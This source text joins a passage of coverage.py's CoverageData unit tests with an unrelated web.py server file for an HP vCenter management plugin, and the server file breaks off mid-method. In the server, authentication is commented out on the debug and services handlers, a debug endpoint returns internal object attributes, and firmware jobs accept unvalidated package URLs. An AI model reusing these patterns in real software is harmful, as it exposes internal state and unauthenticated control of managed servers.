covdata.add_file_tracers({"p1.foo": "p1.plugin"})
def test_cant_change_file_tracer_name(self):
covdata = DebugCoverageData()
covdata.add_lines({"p1.foo": [1, 2, 3]})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
msg = "Conflicting file tracer name for 'p1.foo': 'p1.plugin' vs 'p1.plugin.foo'"
with pytest.raises(DataError, match=msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin.foo"})
def test_update_lines(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
def test_update_arcs(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_arcs(ARCS_4)
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert_line_counts(covdata3, SUMMARY_3_4)
assert_measured_files(covdata3, MEASURED_FILES_3_4)
def test_update_cant_mix_lines_and_arcs(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_arcs(ARCS_3)
with pytest.raises(DataError, match="Can't combine arc data with line data"):
covdata1.update(covdata2)
with pytest.raises(DataError, match="Can't combine line data with arc data"):
covdata2.update(covdata1)
def test_update_file_tracers(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({
"p1.html": [1, 2, 3, 4],
"p2.html": [5, 6, 7],
"main.py": [10, 11, 12],
})
covdata1.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
})
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({
"p1.html": [3, 4, 5, 6],
"p2.html": [7, 8, 9],
"p3.foo": [1000, 1001],
"main.py": [10, 11, 12],
})
covdata2.add_file_tracers({
"p1.html": "html.plugin",
"p2.html": "html.plugin2",
"p3.foo": "foo_plugin",
})
covdata3 = DebugCoverageData(suffix='3')
covdata3.update(covdata1)
covdata3.update(covdata2)
assert covdata3.file_tracer("p1.html") == "html.plugin"
assert covdata3.file_tracer("p2.html") == "html.plugin2"
assert covdata3.file_tracer("p3.foo") == "foo_plugin"
assert covdata3.file_tracer("main.py") == ""
def test_update_conflicting_file_tracers(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({"p1.html": [1, 2, 3]})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({"p1.html": [1, 2, 3]})
covdata2.add_file_tracers({"p1.html": "html.other_plugin"})
msg = "Conflicting file tracer name for 'p1.html': 'html.plugin' vs 'html.other_plugin'"
with pytest.raises(DataError, match=msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': 'html.other_plugin' vs 'html.plugin'"
with pytest.raises(DataError, match=msg):
covdata2.update(covdata1)
def test_update_file_tracer_vs_no_file_tracer(self):
covdata1 = DebugCoverageData(suffix="1")
covdata1.add_lines({"p1.html": [1, 2, 3]})
covdata1.add_file_tracers({"p1.html": "html.plugin"})
covdata2 = DebugCoverageData(suffix="2")
covdata2.add_lines({"p1.html": [1, 2, 3]})
msg = "Conflicting file tracer name for 'p1.html': 'html.plugin' vs ''"
with pytest.raises(DataError, match=msg):
covdata1.update(covdata2)
msg = "Conflicting file tracer name for 'p1.html': '' vs 'html.plugin'"
with pytest.raises(DataError, match=msg):
covdata2.update(covdata1)
def test_update_lines_empty(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata2 = DebugCoverageData(suffix='2')
covdata1.update(covdata2)
assert_line_counts(covdata1, SUMMARY_1)
def test_update_arcs_empty(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_arcs(ARCS_3)
covdata2 = DebugCoverageData(suffix='2')
covdata1.update(covdata2)
assert_line_counts(covdata1, SUMMARY_3)
def test_asking_isnt_measuring(self):
# Asking about an unmeasured file shouldn't make it seem measured.
covdata = DebugCoverageData()
assert_measured_files(covdata, [])
assert covdata.arcs("missing.py") is None
assert_measured_files(covdata, [])
def test_add_to_hash_with_lines(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "a.py", hasher)
assert hasher.method_calls == [
mock.call.update([1, 2]), # lines
mock.call.update(""), # file_tracer name
]
def test_add_to_hash_with_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "y.py", hasher)
assert hasher.method_calls == [
mock.call.update([(-1, 17), (17, 23), (23, -1)]), # arcs
mock.call.update("hologram_plugin"), # file_tracer name
]
def test_add_to_lines_hash_with_missing_file(self):
# https://github.com/nedbat/coveragepy/issues/403
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
assert hasher.method_calls == [
mock.call.update([]),
mock.call.update(None),
]
def test_add_to_arcs_hash_with_missing_file(self):
# https://github.com/nedbat/coveragepy/issues/403
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_file_tracers({"y.py": "hologram_plugin"})
hasher = mock.Mock()
add_data_to_hash(covdata, "missing.py", hasher)
assert hasher.method_calls == [
mock.call.update([]),
mock.call.update(None),
]
def test_empty_lines_are_still_lines(self):
covdata = DebugCoverageData()
covdata.add_lines({})
covdata.touch_file("abc.py")
assert not covdata.has_arcs()
def test_empty_arcs_are_still_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs({})
covdata.touch_file("abc.py")
assert covdata.has_arcs()
def test_cant_touch_in_empty_data(self):
covdata = DebugCoverageData()
msg = "Can't touch files in an empty CoverageData"
with pytest.raises(DataError, match=msg):
covdata.touch_file("abc.py")
def test_read_and_write_are_opposites(self):
covdata1 = DebugCoverageData()
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = DebugCoverageData()
covdata2.read()
assert_arcs3_data(covdata2)
def test_thread_stress(self):
covdata = DebugCoverageData()
exceptions = []
def thread_main():
"""Every thread will try to add the same data."""
try:
covdata.add_lines(LINES_1)
except Exception as ex: # pragma: only failure
exceptions.append(ex)
threads = [threading.Thread(target=thread_main) for _ in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_lines1_data(covdata)
assert not exceptions
class CoverageDataInTempDirTest(CoverageTest):
"""Tests of CoverageData that need a temporary directory to make files."""
def test_read_write_lines(self):
covdata1 = DebugCoverageData("lines.dat")
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = DebugCoverageData("lines.dat")
covdata2.read()
assert_lines1_data(covdata2)
def test_read_write_arcs(self):
covdata1 = DebugCoverageData("arcs.dat")
covdata1.add_arcs(ARCS_3)
covdata1.write()
covdata2 = DebugCoverageData("arcs.dat")
covdata2.read()
assert_arcs3_data(covdata2)
def test_read_errors(self):
self.make_file("xyzzy.dat", "xyzzy")
with pytest.raises(DataError, match=r"Couldn't .* '.*[/\\]xyzzy.dat': \S+"):
covdata = DebugCoverageData("xyzzy.dat")
covdata.read()
assert not covdata
def test_hard_read_error(self):
self.make_file("noperms.dat", "go away")
os.chmod("noperms.dat", 0)
with pytest.raises(DataError, match=r"Couldn't .* '.*[/\\]noperms.dat': \S+"):
covdata = DebugCoverageData("noperms.dat")
covdata.read()
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_error_when_closing(self, klass):
msg = r"Couldn't .* '.*[/\\]flaked.dat': \S+"
with pytest.raises(DataError, match=msg):
covdata = klass("flaked.dat")
covdata.add_lines(LINES_1)
# I don't know how to make a real error, so let's fake one.
sqldb = list(covdata._dbs.values())[0]
sqldb.close = lambda: 1/0
covdata.add_lines(LINES_1)
def test_wrong_schema_version(self):
with sqlite3.connect("wrong_schema.db") as con:
con.execute("create table coverage_schema (version integer)")
con.execute("insert into coverage_schema (version) values (99)")
msg = r"Couldn't .* '.*[/\\]wrong_schema.db': wrong schema: 99 instead of \d+"
with pytest.raises(DataError, match=msg):
covdata = DebugCoverageData("wrong_schema.db")
covdata.read()
assert not covdata
def test_wrong_schema_schema(self):
with sqlite3.connect("wrong_schema_schema.db") as con:
con.execute("create table coverage_schema (xyzzy integer)")
con.execute("insert into coverage_schema (xyzzy) values (99)")
msg = r"Data file .* doesn't seem to be a coverage data file: .* no such column"
with pytest.raises(DataError, match=msg):
covdata = DebugCoverageData("wrong_schema_schema.db")
covdata.read()
assert not covdata
class CoverageDataFilesTest(CoverageTest):
"""Tests of CoverageData file handling."""
def test_reading_missing(self):
self.assert_doesnt_exist(".coverage")
covdata = DebugCoverageData()
covdata.read()
assert_line_counts(covdata, {})
def test_writing_and_reading(self):
covdata1 = DebugCoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = DebugCoverageData()
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
def test_debug_output_with_debug_option(self):
# With debug option dataio, we get debug output about reading and
# writing files.
debug = DebugControlString(options=["dataio"])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
assert re.search(
r"^Erasing data file '.*\.coverage'\n" +
r"Opening data file '.*\.coverage'\n" +
r"Initing data file '.*\.coverage'\n" +
r"Opening data file '.*\.coverage'\n$",
debug.get_output()
)
def test_debug_output_without_debug_option(self):
# With a debug object, but not the dataio option, we don't get debug
# output.
debug = DebugControlString(options=[])
covdata1 = CoverageData(debug=debug)
covdata1.add_lines(LINES_1)
covdata1.write()
covdata2 = CoverageData(debug=debug)
covdata2.read()
assert_line_counts(covdata2, SUMMARY_1)
assert debug.get_output() == ""
def test_explicit_suffix(self):
self.assert_doesnt_exist(".coverage.SUFFIX")
covdata = DebugCoverageData(suffix='SUFFIX')
covdata.add_lines(LINES_1)
covdata.write()
self.assert_exists(".coverage.SUFFIX")
self.assert_doesnt_exist(".coverage")
def test_true_suffix(self):
self.assert_file_count(".coverage.*", 0)
# suffix=True will make a randomly named data file.
covdata1 = DebugCoverageData(suffix=True)
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_doesnt_exist(".coverage")
data_files1 = glob.glob(".coverage.*")
assert len(data_files1) == 1
# Another suffix=True will choose a different name.
covdata2 = DebugCoverageData(suffix=True)
covdata2.add_lines(LINES_1)
covdata2.write()
self.assert_doesnt_exist(".coverage")
data_files2 = glob.glob(".coverage.*")
assert len(data_files2) == 2
# In addition to being different, the suffixes have the pid in them.
assert all(str(os.getpid()) in fn for fn in data_files2)
def test_combining(self):
self.assert_file_count(".coverage.*", 0)
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines(LINES_1)
covdata1.write()
self.assert_exists(".coverage.1")
self.assert_file_count(".coverage.*", 1)
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines(LINES_2)
covdata2.write()
self.assert_exists(".coverage.2")
self.assert_file_count(".coverage.*", 2)
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3)
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_file_count(".coverage.*", 0)
def test_erasing(self):
covdata1 = DebugCoverageData()
covdata1.add_lines(LINES_1)
covdata1.write()
covdata1.erase()
assert_line_counts(covdata1, {})
covdata2 = DebugCoverageData()
covdata2.read()
assert_line_counts(covdata2, {})
def test_erasing_parallel(self):
self.make_file("datafile.1")
self.make_file("datafile.2")
self.make_file(".coverage")
data = DebugCoverageData("datafile")
data.erase(parallel=True)
self.assert_file_count("datafile.*", 0)
self.assert_exists(".coverage")
def test_combining_with_aliases(self):
covdata1 = DebugCoverageData(suffix='1')
covdata1.add_lines({
'/home/ned/proj/src/a.py': {1, 2},
'/home/ned/proj/src/sub/b.py': {3},
'/home/ned/proj/src/template.html': {10},
})
covdata1.add_file_tracers({
'/home/ned/proj/src/template.html': 'html.plugin',
})
covdata1.write()
covdata2 = DebugCoverageData(suffix='2')
covdata2.add_lines({
r'c:\ned\test\a.py': {4, 5},
r'c:\ned\test\sub\b.py': {3, 6},
})
covdata2.write()
self.assert_file_count(".coverage.*", 2)
covdata3 = DebugCoverageData()
aliases = PathAliases()
aliases.add("/home/ned/proj/src/", "./")
aliases.add(r"c:\ned\test", "./")
combine_parallel_data(covdata3, aliases=aliases)
self.assert_file_count(".coverage.*", 0)
# covdata3 hasn't been written yet. Should this file exist or not?
#self.assert_exists(".coverage")
apy = canonical_filename('./a.py')
sub_bpy = canonical_filename('./sub/b.py')
template_html = canonical_filename('./template.html')
assert_line_counts(covdata3, {apy: 4, sub_bpy: 2, template_html: 1}, fullpath=True)
assert_measured_files(covdata3, [apy, sub_bpy, template_html])
assert covdata3.file_tracer(template_html) == 'html.plugin'
def test_combining_from_different_directories(self):
os.makedirs('cov1')
covdata1 = DebugCoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = DebugCoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = DebugCoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2'])
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
def test_combining_from_files(self):
os.makedirs('cov1')
covdata1 = DebugCoverageData('cov1/.coverage.1')
covdata1.add_lines(LINES_1)
covdata1.write()
os.makedirs('cov2')
covdata2 = DebugCoverageData('cov2/.coverage.2')
covdata2.add_lines(LINES_2)
covdata2.write()
# This data won't be included.
covdata_xxx = DebugCoverageData('.coverage.xxx')
covdata_xxx.add_arcs(ARCS_3)
covdata_xxx.write()
covdata_2xxx = DebugCoverageData('cov2/.coverage.xxx')
covdata_2xxx.add_arcs(ARCS_3)
covdata_2xxx.write()
covdata3 = DebugCoverageData()
combine_parallel_data(covdata3, data_paths=['cov1', 'cov2/.coverage.2'])
assert_line_counts(covdata3, SUMMARY_1_2)
assert_measured_files(covdata3, MEASURED_FILES_1_2)
self.assert_doesnt_exist("cov1/.coverage.1")
self.assert_doesnt_exist("cov2/.coverage.2")
self.assert_exists(".coverage.xxx")
self.assert_exists("cov2/.coverage.xxx")
def test_combining_from_nonexistent_directories(self):
covdata = DebugCoverageData()
msg = "Couldn't combine from non-existent path 'xyzzy'"
with pytest.raises(NoDataError, match=msg):
combine_parallel_data(covdata, data_paths=['xyzzy'])
def test_interleaved_erasing_bug716(self):
# pytest-cov could produce this scenario. #716
covdata1 = DebugCoverageData()
covdata2 = DebugCoverageData()
# this used to create the .coverage database file..
covdata2.set_context("")
# then this would erase it all..
covdata1.erase()
# then this would try to use tables that no longer exist.
# "no such table: meta"
covdata2.add_lines(LINES_1)
class DumpsLoadsTest(CoverageTest):
"""Tests of CoverageData.dumps and loads."""
run_in_temp_dir = False
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_serialization(self, klass):
covdata1 = klass(no_disk=True)
covdata1.add_lines(LINES_1)
covdata1.add_lines(LINES_2)
serial = covdata1.dumps()
covdata2 = klass(no_disk=True)
covdata2.loads(serial)
assert_line_counts(covdata2, SUMMARY_1_2)
assert_measured_files(covdata2, MEASURED_FILES_1_2)
def test_misfed_serialization(self):
covdata = CoverageData(no_disk=True)
bad_data = b'Hello, world!\x07 ' + b'z' * 100
msg = r"Unrecognized serialization: {} \(head of {} bytes\)".format(
re.escape(repr(bad_data[:40])),
len(bad_data),
)
with pytest.raises(DataError, match=msg):
covdata.loads(bad_data)
class NoDiskTest(CoverageTest):
"""Tests of in-memory CoverageData."""
run_in_temp_dir = False
def test_updating(self):
# https://github.com/nedbat/coveragepy/issues/1323
a = CoverageData(no_disk=True)
a.add_lines({'foo.py': [10, 20, 30]})
assert a.measured_files() == {'foo.py'}
b = CoverageData(no_disk=True)
b.update(a)
assert b.measured_files() == {'foo.py'}
|
ic4vc_webserver.py
|
'''
Created on Oct 18, 2011
@author: IslamM
'''
from threading import Thread
import web, os
from web.wsgiserver import CherryPyWSGIServer
from suds.sudsobject import Object as SudsObject
from logging import getLogger
log = getLogger(__name__)
from util import catalog
from util.config import config
import json
from portlets.host import Host
from portlets.cva import cva
from portlets.network import Network
from portlets import cluster
from engines.deployment_connector import ALDeploymentConnector
from vmware.vcenter import vCenter
from time import sleep
from engines.firmware import HostFirmware
from util.smartcomponent import get_scm
from portlets.cluster import ClusterSwFwDetail
from portlets.collector import Collector, ClusterCollector
from urlparse import urlparse
from urllib import unquote
from core.uim import UIManager
import portlets.collector
import time
urls = [
'/debug/(.*)', 'wdebug',
'/debug/', 'wdebug',
'/services/clusterswfwdetail', 'ClusterSwFwDetail',
'/services/', 'wservices',
'/services/(.*)', 'wservices',
'/deployment/', 'deployment',
'/firmware/', 'firmware',
'/firmware', 'firmware',
'/firmware/jobs', 'firmware_jobs',
'/firmware/jobs/', 'firmware_jobs',
'/smart_components', 'smart_components',
'/settings/(.+)', 'Settings',
'/uidcontrol', 'UIDControl',
'/cva/summary(/|)', 'CVASummary',
'/cva/summary/(.+)(/|)', 'CVASummary',
]
service_dispatcher = {'hostsummary': Host.summary,
'hostdetail': Host.detail,
'hoststatus': Host.hoststatus,
'networksummary': Network.summary,
'networkdetail': Network.detail,
'hostswfwsummary': Host.swfwsummary,
'hostswfwdetail': Host.swfwdetail,
'hostinfrasummary': Host.infrasummary,
'hostinfradetail': Host.infradetail,
'hostlaunchtools': Host.launchtools,
'hostsimlaunchinfo': Host.simlaunchinfo,
'hostcommsummary': Host.commsummary,
'clustersummary': cluster.summary,
'clusterdetail': cluster.detail,
'clusterinfrasummary': cluster.infrasummary,
'clusterinfradetail': cluster.infradetail,
'clusterswfwsummary': cluster.swfwsummary,
'clusterlaunchtools': cluster.launchtools,
'clusterstatus': cluster.clusterstatus,
'cvasummary': cva.summary,
'cvadetail': cva.summary,
'getsummary': cva.getsummary,
'getdetail': cva.getsummary,
'vdisksummary': cva.getvdisk,
'vdiskdetail': cva.getvdisk,
'vdisksummary2': cva.putvdisk,
'vdiskdetail2': cva.putvdisk,
'driversummary': cva.postdriver,
'driverdetail': cva.postdriver,
}
class SudsEncoder(json.JSONEncoder):
'''
A JSON Encoder that understands suds object types.
'''
def default(self, obj):
if isinstance(obj, SudsObject):
d = dict(__classname__=obj.__class__.__name__)
for k in obj.__keylist__:
d[k] = obj.__dict__[k]
return d
return json.JSONEncoder.default(self, obj)
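# Usage sketch: json.dumps(result, cls=SudsEncoder) lets the service handlers
# below return suds results directly; default() flattens each suds object's
# __keylist__ attributes into a plain dict (see wservices.GET).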
class CVASummary:
def GET(self, item=None):
from portlets import cva
s = web.session
try:
data = s.cva_summary_data
except AttributeError:
data = s.cva_summary_data = cva.cva.summary_test()
return json.dumps(data)
def DELETE(self, uuid, item=None):
from portlets import cva
s = web.session
try:
__data__ = s.cva_summary_data
except AttributeError:
__data__ = {}
uuid = uuid.split('/')[0]
        for name, items in __data__.iteritems():
            # Rebuild each list instead of deleting entries while iterating,
            # which skipped the element after every deletion.
            __data__[name] = [item for item in items
                              if not (item.has_key('uuid') and str(item['uuid']) == str(uuid))]
return json.dumps(__data__)
def POST(self, item=None):
from portlets import cva
s = web.session
try:
__data__ = s.cva_summary_data
except AttributeError:
__data__ = {}
data = web.input()
if (len(str(data['uuid'])) > 0):
for name,items in __data__.iteritems():
for item in items:
if (item.has_key('uuid') and (str(item['uuid']) == str(data['uuid']))):
for k,v in data.iteritems():
if (k != 'uuid'):
item[k] = v
else:
import uuid
item = {'uuid':str(uuid.uuid4())}
for k,v in data.iteritems():
if (k != 'uuid'):
item[k] = v
            # setdefault guards against a fresh session without a 'vdisks' list.
            __data__.setdefault('vdisks', []).append(item)
s.cva_summary_data = __data__
return json.dumps(__data__)
class wservices:
def GET(self, item=None):
#session.any_auth()
log.debug('GET wservices %s', item)
if item not in service_dispatcher :
raise web.notfound()
data = service_dispatcher[item]()
return json.dumps(data, cls=SudsEncoder)
class UIDControl:
def PUT(self):
log.debug('uidcontrol')
dc = Collector.get_collector()
cstate = dc.ilo.get('data', {}).get('get_uid_status', {}).get('uid', 'off')
log.debug('Current UID state: %s', cstate)
setstate = 'off'
if cstate.lower() == 'off':
setstate = 'on'
log.debug('Setting UID state to: %s', setstate)
dc.csce.entity_control('ilo', dc.ilo['uuid'], 'uid', setstate)
taskQ = catalog.lookup('ic4vc-server-threadpool').get_q()
taskQ.put((dc.csce.force_update_entity, ('ilo', dc.ilo['uuid'])))
taskQ.put((dc.delayed_update, (30, [True, False])))
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme )
desc = 'UID State Toggled from ' + cstate + ' to ' + setstate
objpath = 'moref=' + dc.moref + '&' + 'serverGuid=' + dc.serverGuid
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
class wdebug:
def GET(self, item=None):
#session.any_auth()
log.debug('Getting catalog item=%s', item)
if item == 'catalog':
q = web.input()
if not q.get('item'):
keys = catalog.keys()
keys.sort()
return keys
else:
web.http.expires(0)
item = q.get('item')
val = catalog.lookup(item)
return val.__dict__.items() if val else None
class deployment:
def get_dc(self):
try:
return [dc for dc in catalog.get_all() if isinstance(dc, ALDeploymentConnector)][0]
except:
return None
def refresh(self):
ALDeploymentConnector.create()
def clear(self):
dc = self.get_dc()
if dc:
dc.clear_finished_jobs()
def updateFolders(self, folders):
dc = self.get_dc()
if dc:
dc.updateJobFolders(folders)
return {}
return {}
def GET(self):
log.debug("calling get_dc()")
dc = self.get_dc()
q = web.input()
log.debug(q)
vc_guid = q.serverGuid.lower()
if dc:
log.debug("in if dc:")
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
deployment_obj = {}
log.debug("calling dc.getJobFolders()")
deployment_obj['JobFolders'] = dc.getJobFolders()
log.debug("calling dc.getManagedNodes()")
deployment_obj['ManagedNodes'] = dc.getManagedNodes()
log.debug("calling dc.getDcStatus()")
deployment_obj['Status'] = dc.getDcStatus()
            try:
                vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==vc_guid]
            except:
                log.debug('error iterating over vc list')
                vc = []
            if not vc:
                # Without a matching vCenter the indexing below would raise
                # IndexError (or NameError after the except path).
                raise web.notfound()
            vc = vc[0]
log.debug("calling vc.retreive_cluster_list()")
clusters = vc.retreive_cluster_list()
names = []
for cluster in clusters:
try:
for prop in cluster.propSet:
if prop.name == 'name':
names.append(prop.val)
except:
pass
deployment_obj['Clusters'] = names
log.debug("vc.retrieve_datacenter_list()")
datacenters = vc.retrieve_datacenter_list()
names = []
for datacenter in datacenters:
try:
for prop in datacenter.propSet:
if prop.name == 'name':
names.append(prop.val)
except:
pass
deployment_obj['Datacenters'] = names
else:
deployment_obj = {}
deployment_obj['Status'] = {'errno':'-1', 'message':'The deployment service is starting.'}
log.debug(json.dumps(deployment_obj))
return json.dumps(deployment_obj)
def POST(self):
log.debug('In POST...')
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
q = web.input()
item = ''
if hasattr(q, 'action'):
item = q.action
if item == '':
deployment_data = json.loads(web.data())
dc = self.get_dc()
if not dc:
raise web.notfound()
dc.begin_run_deployment(deployment_data)
log.debug('Calling dc.begin_run_deployment')
obj = {}
obj['Status'] = {'errno':'8', 'message':'Started job(s)'}
# just return something or the jquery callback won't fire.
log.debug('returning empty object')
return json.dumps(obj)
elif item == 'refresh':
self.refresh()
sleep(1)
while True:
if self.get_dc():
return self.GET()
sleep(1)
elif item == 'clear':
self.clear()
return self.GET()
elif item == 'updateFolders':
log.debug('Calling self.updateFolders')
folders = json.loads(web.data())
result = self.updateFolders(folders)
return json.dumps(result)
return ""
class firmware:
def get_vc(self, serverGuid):
vcs = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
if len(vcs) == 1:
return vcs[0]
else:
return None
def get_host(self, serverGuid, moref):
vc = self.get_vc(serverGuid)
if not vc:
return None
hosts = [host for host in vc.hosts if host.moref().lower()==moref.lower()]
if len(hosts) == 1:
return hosts[0]
else:
return None
def get_hosts(self, serverGuid, moref):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
vc = vc[0]
clusters = vc.retreive_cluster_list()
hosts = []
for cluster in clusters:
mob = cluster.obj._type + ':' + cluster.obj.value
if mob.lower()==moref.lower():
for prop in cluster.propSet:
if prop.name == 'host':
for host in prop.val[0]:
mob = host._type + ':' + host.value
hosts.append(self.get_host(serverGuid, mob))
return hosts
def POST(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
if not 'package_url' in input:
raise web.badrequest()
log.debug('firmware POST %s %s', q.moref, input['package_url'])
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
package_url = input['package_url']
options = input['options']
if q.moref.split(':')[0] == 'ClusterComputeResource':
data = []
for host in item:
# Only execute the requested job on the selected hosts.
if host.name in input['hosts']:
log.debug('firmware queuing job for host %s', host.name)
result = host.host_firmware.queue_firmware_job(package_url, options)
try :
desc = 'Firmware job queued - ' + input['package_url']
objpath = 'moref=' + q.moref + '&' + 'serverGuid=' + q.serverGuid
log.debug('Newsfeed ' + desc)
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme, host = uim_url.hostname )
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
except :
log.exception("Error generating newsfeed for firmware job queued")
else:
result = host.host_firmware.get_firmware_jobs()
data.append({'Host': host.name, 'FirmwareJobs': result})
#json.dump(data, open('firmware_resp.json', 'w+'), indent=4) #debug
return json.dumps(data)
else:
result = item.host_firmware.queue_firmware_job(package_url, options)
try :
desc = 'Firmware job queued - ' + input['package_url']
objpath = 'moref=' + q.moref + '&' + 'serverGuid=' + q.serverGuid
log.debug('Newsfeed ' + desc)
uim_url = urlparse(config().get_uim_root())
uimgr = UIManager(port=uim_url.port, protocol=uim_url.scheme, host = uim_url.hostname )
uimgr.post_event(objpath, desc, 'User Action', 'INFORMATION', time.time())
except :
log.exception("Error generating newsfeed for firmware job queued")
return json.dumps(result)
return None
else:
raise web.notfound()
def DELETE(self):
web.header('Content-Type', 'text/javascript')
web.http.expires(0)
input = json.loads(web.data())
q = web.input()
if not hasattr(q, 'moref') or q.moref == '':
raise web.badrequest()
if not hasattr(q, 'serverGuid') or q.serverGuid == '':
raise web.badrequest()
if not 'package_url' in input:
raise web.badrequest()
log.debug('firmware DELETE job %s %s', q.moref, input['package_url'])
if q.moref.split(':')[0] == 'HostSystem':
item = self.get_host(q.serverGuid, q.moref)
if not item:
raise web.notfound()
# Check to see if the firmware object has been created. Create it if not.
try:
fw = getattr(item, 'host_firmware')
except AttributeError:
setattr(item, 'host_firmware', HostFirmware(item, q.serverGuid))
elif q.moref.split(':')[0] == 'ClusterComputeResource':
item = self.get_hosts(q.serverGuid, q.moref)
for host in item:
try:
fw = getattr(host, 'host_firmware')
except AttributeError:
setattr(host, 'host_firmware', HostFirmware(host, q.serverGuid))
else:
raise web.notfound()
if item:
            if q.moref.split(':')[0] == 'ClusterComputeResource':
                data = []
                for host in item:
                    if host.name in input['hosts']:
                        result = host.host_firmware.delete_queued_job(input['package_url'])
                        if not result:
                            raise web.notfound()
                    else:
                        result = host.host_firmware.get_firmware_jobs()
                    data.append({'Host': host.name, 'FirmwareJobs': result})
                # Build the response with json.dumps, matching the POST handler;
                # the old string concatenation left a trailing comma before the
                # closing bracket and emitted invalid JSON.
                return json.dumps(data)
else:
result = item.host_firmware.delete_queued_job(input['package_url'])
if not result :
raise web.notfound()
return json.dumps(result)
return None
else:
raise web.notfound()
class firmware_jobs:
def get_vc(self, serverGuid):
vcs = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
if len(vcs) == 1:
return vcs[0]
else:
return None
def get_host(self, serverGuid, moref):
vc = self.get_vc(serverGuid)
if not vc:
return None
hosts = [host for host in vc.hosts if host.moref().lower()==moref.lower()]
if len(hosts) == 1:
return hosts[0]
else:
return None
def get_hosts(self, serverGuid, moref):
vc = [vc for vc in catalog.get_all() if isinstance(vc, vCenter) and vc.sc.about.instanceUuid.lower()==serverGuid.lower()]
vc = vc[0]
clusters = vc.retreive_cluster_list()
hosts = []
for cluster in clusters:
mob = cluster.obj._type + ':' + cluster.obj.value
if mob.lower()==moref.lower():
for prop in cluster.propSet:
if prop.name == 'host':
